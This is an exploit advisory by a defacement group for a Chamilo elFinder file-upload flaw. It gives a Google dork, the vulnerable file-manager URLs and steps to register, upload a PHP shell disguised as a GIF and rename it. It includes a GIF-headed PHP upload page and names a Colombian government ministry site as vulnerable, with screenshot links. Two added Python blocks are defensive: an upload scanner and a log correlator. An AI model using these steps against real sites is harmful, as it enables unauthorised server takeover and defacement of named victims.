KingSkrupellos

Chamilo © 2020 Campus v1 ElFinder Shell Upload

May 26th, 2020
####################################################################

# Exploit Title : Chamilo © 2020 Campus v1 ElFinder Backdoor Access Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27 May 2020
# Vendor Homepage : campus.chamilo.org
# Software Version : 1 and 1.x.x etc...
# Software Download Link : chamilo.org/en/download/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Powered by Chamilo © 2020 site:com
# Vulnerability Type :
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 Permissions, Privileges, and Access Controls
CAPEC-650 [ Upload a Web Shell to a Web Server ]
CAPEC-17 [ Using Malicious Files ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities

####################################################################

# Impact :
***********
This software is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.

CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
*********************************************************
The software allows the attacker to upload or transfer files of dangerous types that
can be automatically processed within the product's environment.

CWE-264 Permissions, Privileges, and Access Controls
****************************************************
Weaknesses in this category are related to the management of
permissions, privileges, and other security features that are used
to perform access control.

CAPEC-650 [ Upload a Web Shell to a Web Server ]
*********************************************************
By exploiting insufficient permissions, it is possible to upload a web shell to a web server in
such a way that it can be executed remotely. This shell can have various capabilities, thereby acting
as a "gateway" to the underlying web server. The shell might execute at the higher permission level
of the web server, providing the ability to execute malicious code at elevated levels.

CAPEC-17 [ Using Malicious Files ]
*******************************
An attack of this type exploits a system's configuration that allows an attacker to either directly
access an executable file, for example through shell access, or in a possible worst case allows
an attacker to upload a file and then execute it. Web servers, FTP servers, and message-oriented
middleware systems which have many integration points are particularly vulnerable, because
both the programmers and the administrators must be in sync regarding the interfaces
and the correct privileges for each interface.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en

/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en#elf_l2_Lw

Important Note : Ministry of Commerce, Industry and Tourism of Colombia [ mincit.gov.co ] is vulnerable.

If it says to you :

Unable to connect to backend.
Invalid backend configuration.
Readable volumes not available.

Then register yourself with an Admin or Author account.

/main/auth/inscription.php

Then you can use File Upload and shell the sites with .php.gif or .php.pjpg

Use your Brain :)

Vulnerability ScreenShot Proof =>

https://www.upload.ee/image/11775401/mincitgovcoexploitelfinder27520.png

https://www.upload.ee/image/11775402/elfinderexploit27052020.png

Upload your shell in GIF format and then rename the extension.

# If the rename function is disabled, add GIF89;aGIF89;aGIF89;a before <?PHP
# Example

GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
</head>
<body>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
    if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
    { echo "<br>file exists, try with another name"; }
    else {
        echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $tgt_file))
        { echo "<br>File UPLOADED:- ".$tgt_file; }
        else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
    }
}
?>
</body>
</html>
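From the defender's side, the two tricks above (a double extension such as .php.gif, and a fake GIF header glued in front of PHP code) leave fingerprints that an upload scanner can catch. This is an added example, not code from the advisory or from Chamilo; it generalises the magic-byte check to JPEG and PNG as well, and the sample uploads it inspects are constructed here.

```python
# Added defensive example, not from the original advisory: a scanner for the
# disguised-script uploads described above. Sample uploads are constructed here.
import re

SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
IMAGE_EXTS = {"gif", "jpg", "jpeg", "pjpg", "png"}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")

def findings_for(name: str, data: bytes) -> list[str]:
    """Reasons an uploaded file looks like a script dressed up as an image."""
    reasons = []
    exts = name.lower().split(".")[1:]
    # shell.php.gif: a script extension anywhere before the final one.
    if any(e in SCRIPT_EXTS for e in exts[:-1]):
        reasons.append("double extension carries a script extension")
    # A user-files area should never hold PHP code, whatever the name says.
    if PHP_OPEN_TAG.search(data):
        reasons.append("content contains a PHP open tag")
    # Image by name, but the first bytes are not a real image signature
    # ('GIF89;a' as used above is not the GIF magic 'GIF89a').
    if exts and exts[-1] in IMAGE_EXTS and not data.startswith(IMAGE_MAGIC):
        reasons.append("image extension without valid image magic bytes")
    return reasons

def scan(uploads: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each upload name to its findings; clean files are omitted."""
    return {n: r for n, d in uploads.items() if (r := findings_for(n, d))}

# Constructed samples: a polyglot like the advisory's, a real 1x1 GIF, plain HTML.
SAMPLES = {
    "shell.php.gif": b"GIF89;aGIF89;aGIF89;a<html><body><?php echo 'x'; ?></body></html>",
    "avatar.gif": (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
                   b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"),
    "notes.html": b"<html><body><p>lecture notes</p></body></html>",
}

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(name, "->", "; ".join(reasons))
```

Run it against a real my_files tree by reading each file's first few kilobytes into the same dict; a hit on any of the three checks is enough to quarantine the file and alert.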

Directory File Path :
**********************
/app/upload/users/[ID-NUMBER]/[YOUR-NUMBER-ID]/my_files/[YOURFILENAME].html

[PATH]/my_files/[YOURFILENAME].html

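The two paths named in this advisory, the elFinder file manager and the my_files directory the uploads land in, are also what a detection engineer would correlate in web server access logs. The following is an added example, not part of the advisory or of Chamilo; it assumes Common Log Format lines and that the upload tree is served directly as shown above, and the log lines it parses are constructed.

```python
# Added defensive example, not from the original advisory: correlate web server
# access-log lines so that a client who opened the elFinder file manager and then
# fetched a script-typed file from a my_files directory is flagged.
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
FILEMANAGER = "/main/inc/lib/elfinder/filemanager.php"
# Files under the user upload tree named above that a server might execute or render.
USER_SCRIPT = re.compile(
    r"^/app/upload/users/\d+/\d+/my_files/[^/?]+\.(html?|php\d?|phtml|phar)(\?|$)",
    re.IGNORECASE,
)

def suspicious_uploads(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, path) for each 200 response serving a script-typed
    my_files object to a client that had earlier requested the file manager."""
    opened = set()
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m["ip"], m["path"], m["status"]
        if path.split("?", 1)[0] == FILEMANAGER:
            opened.add(ip)
        elif ip in opened and status == "200" and USER_SCRIPT.match(path):
            hits.append((ip, path))
    return hits

# Constructed sample log (Common Log Format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [27/May/2020:10:01:12 +0000] "GET /main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en HTTP/1.1" 200 5120
203.0.113.7 - - [27/May/2020:10:02:03 +0000] "GET /app/upload/users/1/42/my_files/test.html HTTP/1.1" 200 1402
198.51.100.9 - - [27/May/2020:10:05:00 +0000] "GET /app/upload/users/1/42/my_files/notes.pdf HTTP/1.1" 200 88000
198.51.100.9 - - [27/May/2020:10:05:30 +0000] "GET /main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0&langCode=en HTTP/1.1" 200 5120
192.0.2.5 - - [27/May/2020:10:06:00 +0000] "GET /app/upload/users/3/7/my_files/slides.html HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for ip, path in suspicious_uploads(SAMPLE_LOG):
        print(f"{ip} fetched {path} after opening the file manager")
```

Only the first client is reported: the second never fetched a script-typed file, and the third viewed an .html file without having used the file manager, which is ordinary student traffic.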
####################################################################

# Example Vulnerable Sites :
************************
####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################